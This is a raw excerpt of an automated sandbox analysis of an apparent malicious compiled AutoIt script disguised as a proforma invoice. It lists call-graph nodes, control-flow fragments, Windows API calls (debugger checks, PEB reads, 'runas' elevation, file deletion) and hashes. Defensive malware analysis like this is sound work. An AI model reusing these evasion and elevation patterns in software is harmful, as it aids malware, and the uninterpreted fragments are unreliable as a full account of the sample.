102679 28dff6 102708 2af8aa 91 API calls 4 library calls 102679->102708 102680 25750f 59 API calls 102694 256265 102680->102694 102683->102670 102685 28e004 102687 25750f 59 API calls 102685->102687 102686 257d8c 59 API calls 102686->102694 102688 28e01a 102687->102688 102688->102683 102689 256799 _memmove 102709 2af8aa 91 API calls 4 library calls 102689->102709 102690 28df92 102691 258029 59 API calls 102690->102691 102693 28df9d 102691->102693 102697 270db6 Mailbox 59 API calls 102693->102697 102694->102675 102694->102679 102694->102680 
102694->102686 102694->102689 102694->102690 102695 257e4f 59 API calls 102694->102695 102704 255f6c 60 API calls 102694->102704 102705 255d41 59 API calls Mailbox 102694->102705 102706 255e72 60 API calls 102694->102706 102707 257924 59 API calls 2 library calls 102694->102707 102696 25643b CharUpperBuffW 102695->102696 102696->102694 102697->102689 102698->102670 102700 270db6 Mailbox 59 API calls 102699->102700 102701 257a3b 102700->102701 102702 258029 59 API calls 102701->102702 102703 257a4a 102702->102703 102703->102694 102704->102694 102705->102694 102706->102694 102707->102694 102708->102685 102709->102683 102710->101523 102711->101524 102713 254196 102712->102713 102714 28d423 102712->102714 102713->101533 102738 2b2f94 62 API calls _W_store_winword 102713->102738 102714->102713 102715 28d42c DestroyIcon 102714->102715 102715->102713 102717 25416f Mailbox 102716->102717 102718 254098 102716->102718 102717->101536 102719 257a16 59 API calls 102718->102719 102720 2540a6 102719->102720 102721 28d3c8 LoadStringW 102720->102721 102722 2540b3 102720->102722 102725 28d3e2 102721->102725 102723 257bcc 59 API calls 102722->102723 102724 2540c8 102723->102724 102724->102725 102726 2540d9 102724->102726 102727 257b2e 59 API calls 102725->102727 102728 254174 102726->102728 102729 2540e3 102726->102729 102732 28d3ec 102727->102732 102730 258047 59 API calls 102728->102730 102731 257b2e 59 API calls 102729->102731 102735 2540ed _memset _wcscpy 102730->102735 102731->102735 102733 257cab 59 API calls 102732->102733 102732->102735 102734 28d40e 102733->102734 102736 257cab 59 API calls 102734->102736 102737 254155 Shell_NotifyIconW 102735->102737 102736->102735 102737->102717 102738->101533 102740 25e6d5 102739->102740 102741 25e73f 102740->102741 102742 293aa9 102740->102742 102752 25e799 102740->102752 102746 257667 59 API calls 102741->102746 102741->102752 102909 259ea0 102742->102909 102744 257667 59 API calls 102744->102752 102745 293abe 102769 25e970 Mailbox 
102745->102769 102933 2b9e4a 89 API calls 4 library calls 102745->102933 102748 293b04 102746->102748 102750 272d40 __cinit 67 API calls 102748->102750 102749 272d40 __cinit 67 API calls 102749->102752 102750->102752 102751 293b26 102751->101603 102752->102744 102752->102749 102752->102751 102754 25e95a 102752->102754 102752->102769 102753 2584c0 69 API calls 102753->102769 102754->102769 102934 2b9e4a 89 API calls 4 library calls 102754->102934 102755 259ea0 331 API calls 102755->102769 102757 258d40 59 API calls 102757->102769 102760 2b9e4a 89 API calls 102760->102769 102766 293e25 102766->101603 102767 25f195 102938 2b9e4a 89 API calls 4 library calls 102767->102938 102768 25ea78 102768->101603 102769->102753 102769->102755 102769->102757 102769->102760 102769->102767 102769->102768 102908 257f77 59 API calls 2 library calls 102769->102908 102935 2a6e8f 59 API calls 102769->102935 102936 2cc5c3 331 API calls 102769->102936 102937 2cb53c 331 API calls Mailbox 102769->102937 102939 259c90 59 API calls Mailbox 102769->102939 102940 2c93c6 331 API calls Mailbox 102769->102940 102771 25f650 102770->102771 102772 25f4ba 102770->102772 102775 257de1 59 API calls 102771->102775 102773 25f4c6 102772->102773 102774 29441e 102772->102774 103039 25f290 331 API calls 2 library calls 102773->103039 103041 2cbc6b 331 API calls Mailbox 102774->103041 102781 25f58c Mailbox 102775->102781 102778 29442c 102782 25f630 102778->102782 103042 2b9e4a 89 API calls 4 library calls 102778->103042 102780 25f4fd 102780->102778 102780->102781 102780->102782 102788 254e4a 84 API calls 102781->102788 102947 2bcb7a 102781->102947 103027 2b3c37 102781->103027 103030 2c445a 102781->103030 102782->101603 102784 25f5e3 102784->102782 103040 259c90 59 API calls Mailbox 102784->103040 102788->102784 103200 258180 102789->103200 102791 25fd3d 102793 29472d 102791->102793 102837 2606f6 102791->102837 103205 25f234 102791->103205 103222 2b9e4a 89 API calls 4 library calls 102793->103222 102796 294742 
[Execution graph, continued: the original page renders an interactive call graph from a node/edge list (node IDs are function addresses in the 0x25xxxx image plus a separate region at 0xc4fec8-0xc53382); the raw list is not reproduced here. API calls attached to graph nodes in this span: GetFileAttributesW, FindFirstFileW/FindClose, CharUpperBuffW, CharLowerBuffW, GetVersionExW, GetCurrentProcess/IsWow64Process, LoadLibraryA/GetProcAddress, GetNativeSystemInfo, GetSystemInfo, FreeLibrary, GetStdHandle, OleInitialize, CreateThread/CloseHandle, RegisterWindowMessageW, DefWindowProcW, PostQuitMessage, SetTimer/KillTimer, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject/DestroyWindow, VirtualProtect, GetCurrentProcess/TerminateProcess, RegOpenKeyExW/RegQueryValueExW/RegCloseKey, GetFullPathNameW, Sleep, and a PEB read (labelled GetPEB) in the 0xc5xxxx region.]

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B68
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00253B7A
                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,003152F8,003152E0,?,?), ref: 00253BEB
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                      • Part of subcall function 0026092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C14,003152F8,?,?,?), ref: 0026096E
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00253C6F
                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00307770,00000010), ref: 0028D281
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,003152F8,?,?,?), ref: 0028D2B9
                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00304260,003152F8,?,?,?), ref: 0028D33F
                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0028D346
                                                                                                                      • Part of subcall function 00253A46: GetSysColorBrush.USER32(0000000F), ref: 00253A50
                                                                                                                      • Part of subcall function 00253A46: LoadCursorW.USER32(00000000,00007F00), ref: 00253A5F
                                                                                                                      • Part of subcall function 00253A46: LoadIconW.USER32(00000063), ref: 00253A76
                                                                                                                      • Part of subcall function 00253A46: LoadIconW.USER32(000000A4), ref: 00253A88
                                                                                                                      • Part of subcall function 00253A46: LoadIconW.USER32(000000A2), ref: 00253A9A
                                                                                                                      • Part of subcall function 00253A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AC0
                                                                                                                      • Part of subcall function 00253A46: RegisterClassExW.USER32(?), ref: 00253B16
                                                                                                                      • Part of subcall function 002539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A03
                                                                                                                      • Part of subcall function 002539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A24
                                                                                                                      • Part of subcall function 002539D5: ShowWindow.USER32(00000000,?,?), ref: 00253A38
                                                                                                                      • Part of subcall function 002539D5: ShowWindow.USER32(00000000,?,?), ref: 00253A41
                                                                                                                      • Part of subcall function 0025434A: _memset.LIBCMT ref: 00254370
                                                                                                                      • Part of subcall function 0025434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00254415
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%.
                                                                                                                    • API String ID: 529118366-1956105530
                                                                                                                    • Opcode ID: 9332150073f948f6401d29008412647c63eb2241bddef46cd16a171960ba1597
                                                                                                                    • Instruction ID: 06258cd2555686946cd88dffaf2dba8b7f9e1a7e3c759af6b34b98c4a6328ae8
                                                                                                                    • Opcode Fuzzy Hash: 9332150073f948f6401d29008412647c63eb2241bddef46cd16a171960ba1597
                                                                                                                    • Instruction Fuzzy Hash: 6F512A31D65149EECF02EBB4EC059FD7778AF8D742F008466FC51A21A1CA70566ACF29

                                                                                                                    Control-flow Graph

                                                                                                                     [Control-flow graph of the routine at 002549A0 (the original page colours basic blocks as executed / not executed; the block list is not reproduced here). Basic blocks span 2549a0-254b35 and 28d767-28d894. Calls in graph order: 257667, GetVersionExW, 257bcc; 257d2c, 257726; GetCurrentProcess, IsWow64Process; 254b37 (two call sites); GetNativeSystemInfo; GetSystemInfo (two call sites); FreeLibrary.]
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 002549CD
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • GetCurrentProcess.KERNEL32(?,002DFAEC,00000000,00000000,?), ref: 00254A9A
                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00254AA1
                                                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00254AE7
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00254AF2
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00254B23
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00254B2F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1986165174-0
                                                                                                                    • Opcode ID: cd8fa14cbdfa3eda4a67fb68a1a8ad7bad4bb3c4e1a21d25cd31aa088176dcbc
                                                                                                                    • Instruction ID: d95f96ff178e2d7f402c200ca2a93ab3a3cfbc0602ca4637fbbeede16797748d
                                                                                                                    • Opcode Fuzzy Hash: cd8fa14cbdfa3eda4a67fb68a1a8ad7bad4bb3c4e1a21d25cd31aa088176dcbc
                                                                                                                    • Instruction Fuzzy Hash: 3C9115359AA7C1DEC731EB6894501AAFFF4AF29305B04496ED4CB83A81D230E95CC71D

                                                                                                                    Control-flow Graph

                                                                                                                    • Control-flow graph of the function starting at 254e89 (rendered graph data not reproduced; its API calls are listed under APIs below)
                                                                                                                    APIs
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00254D8E,?,?,00000000,00000000), ref: 00254E99
                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00254D8E,?,?,00000000,00000000), ref: 00254EB0
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F), ref: 0028D937
                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F), ref: 0028D94C
                                                                                                                    • LockResource.KERNEL32(00254D8E,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F,00000000), ref: 0028D95F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: SCRIPT
                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                    • Opcode ID: 816192e4d9d301f34905e73c6df5b13263b490fb2c853e22b93ead8981930563
                                                                                                                    • Instruction ID: e73698e0b96f023eeddb248f9f755e7f677296938bb72cb04374d23abe55a382
                                                                                                                    • Opcode Fuzzy Hash: 816192e4d9d301f34905e73c6df5b13263b490fb2c853e22b93ead8981930563
                                                                                                                    • Instruction Fuzzy Hash: 3B11BC70600301ABD7229F65EC49F27BBBAEBC5B01F14422DF80686290DB71EC048A24
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: pb1$%.
                                                                                                                    • API String ID: 3964851224-8071122
                                                                                                                    • Opcode ID: 7fe650e23bc6c4553367e1c7e092ca6d3d7d83e9daa0994c0a2c2f9e64b96eb3
                                                                                                                    • Instruction ID: f402e41bf585b1b17b310181c686d7bc432448a0bdbae6e1b445388ce99515ec
                                                                                                                    • Opcode Fuzzy Hash: 7fe650e23bc6c4553367e1c7e092ca6d3d7d83e9daa0994c0a2c2f9e64b96eb3
                                                                                                                    • Instruction Fuzzy Hash: 659259706283418FD720DF14C480B6BB7E5BF89304F14896DE88A9B351D775ECA9DB92
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,0028E398), ref: 002B446A
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 002B447B
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002B448B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48322524-0
                                                                                                                    • Opcode ID: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
                                                                                                                    • Instruction ID: 6beb6790ada8d64729cf50dba9de00f2f41142c8767b223db713eda348279d54
                                                                                                                    • Opcode Fuzzy Hash: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
                                                                                                                    • Instruction Fuzzy Hash: 82E0D8328215016B42107B38FC4D4E9776CAE05375F200716F936C10D0E7B45D209599
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260A5B
                                                                                                                    • timeGetTime.WINMM ref: 00260D16
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260E53
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00260E61
                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00260EFA
                                                                                                                    • DestroyWindow.USER32 ref: 00260F06
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00260F20
                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00294E83
                                                                                                                    • TranslateMessage.USER32(?), ref: 00295C60
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00295C6E
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00295C82
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb1$pb1$pb1$pb1
                                                                                                                    • API String ID: 4212290369-2471073435
                                                                                                                    • Opcode ID: 6a2dba371456e567dc05cedb5abbb712955c0ac08f8815636dd92b67d1d20821
                                                                                                                    • Instruction ID: 588014f2505952ae507c2d7bd650f5bda9966b3baffacf8ffaef8d2ee7334c31
                                                                                                                    • Opcode Fuzzy Hash: 6a2dba371456e567dc05cedb5abbb712955c0ac08f8815636dd92b67d1d20821
                                                                                                                    • Instruction Fuzzy Hash: CDB2F670628752DFDB25DF24C885BABB7E4BF84304F14491DE94A97291CB70E8A4DF82

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B8F5F: __time64.LIBCMT ref: 002B8F69
                                                                                                                      • Part of subcall function 00254EE5: _fseek.LIBCMT ref: 00254EFD
                                                                                                                    • __wsplitpath.LIBCMT ref: 002B9234
                                                                                                                      • Part of subcall function 002740FB: __wsplitpath_helper.LIBCMT ref: 0027413B
                                                                                                                    • _wcscpy.LIBCMT ref: 002B9247
                                                                                                                    • _wcscat.LIBCMT ref: 002B925A
                                                                                                                    • __wsplitpath.LIBCMT ref: 002B927F
                                                                                                                    • _wcscat.LIBCMT ref: 002B9295
                                                                                                                    • _wcscat.LIBCMT ref: 002B92A8
                                                                                                                      • Part of subcall function 002B8FA5: _memmove.LIBCMT ref: 002B8FDE
                                                                                                                      • Part of subcall function 002B8FA5: _memmove.LIBCMT ref: 002B8FED
                                                                                                                    • _wcscmp.LIBCMT ref: 002B91EF
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9824
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9837
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B9452
                                                                                                                    • _wcsncpy.LIBCMT ref: 002B94C5
                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 002B94FB
                                                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002B9511
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9522
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9534
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1500180987-0
                                                                                                                    • Opcode ID: 113b40590a216e0d566a77e08187d1efa5b6dc875ab22fe99b71d415d1dd12f0
                                                                                                                    • Instruction ID: 0765c8b2ae04e6575d0250e33e7d921c30b4b0be412d9d7b6f1269546871a2f7
                                                                                                                    • Opcode Fuzzy Hash: 113b40590a216e0d566a77e08187d1efa5b6dc875ab22fe99b71d415d1dd12f0
                                                                                                                    • Instruction Fuzzy Hash: 0BC15CB1D10219AACF21DFA4CC85AEEB7BCEF45340F0040AAF609E6141EB309A94CF65

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00253074
• RegisterClassExW.USER32(00000030), ref: 0025309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
• InitCommonControlsEx.COMCTL32(?), ref: 002530CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
• LoadIconW.USER32(000000A9), ref: 002530F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 4ecd207570390b65ff0150c2f5128f1f8966d0ed5c929ab62868bcbae033e1d8
• Instruction ID: 1d1475371b4b99fad3009153af2829507d09de7c005399f53393d1387765acbd
• Opcode Fuzzy Hash: 4ecd207570390b65ff0150c2f5128f1f8966d0ed5c929ab62868bcbae033e1d8
• Instruction Fuzzy Hash: F73125B1D51309EFDB41CFA4E989ADDBBF4FB09310F14812AE581E62A0E3B50995CF94

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00253074
• RegisterClassExW.USER32(00000030), ref: 0025309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
• InitCommonControlsEx.COMCTL32(?), ref: 002530CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
• LoadIconW.USER32(000000A9), ref: 002530F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 984ac3025875dd25feac85a7e5c9013fd3a9ce666835817213392e12bd62bae7
• Instruction ID: dd767c4c6a9e6f998bb14d1d45b0e7ea6628b964d4d009b1efc6574edd323447
• Opcode Fuzzy Hash: 984ac3025875dd25feac85a7e5c9013fd3a9ce666835817213392e12bd62bae7
• Instruction Fuzzy Hash: 1F21E4B1E11318EFDB41DFA4E948BDDBBF8FB08701F00812AF911A62A0D7B149448F95

Control-flow Graph

APIs
  • Part of subcall function 00254706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003152F8,?,002537AE,?), ref: 00254724
  • Part of subcall function 0027050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00257165), ref: 0027052D
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002571A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0028E8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0028E909
• RegCloseKey.ADVAPI32(?), ref: 0028E947
• _wcscat.LIBCMT ref: 0028E9A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: fca859c09ea165624e6c2a2b5d4077605b591788d1909e424647201f80b537c0
• Instruction ID: dcf5aec45d6f5d3c50c7172fa2dc13a1e0a64a42cc47f04866a3b4495c8c6d80
• Opcode Fuzzy Hash: fca859c09ea165624e6c2a2b5d4077605b591788d1909e424647201f80b537c0
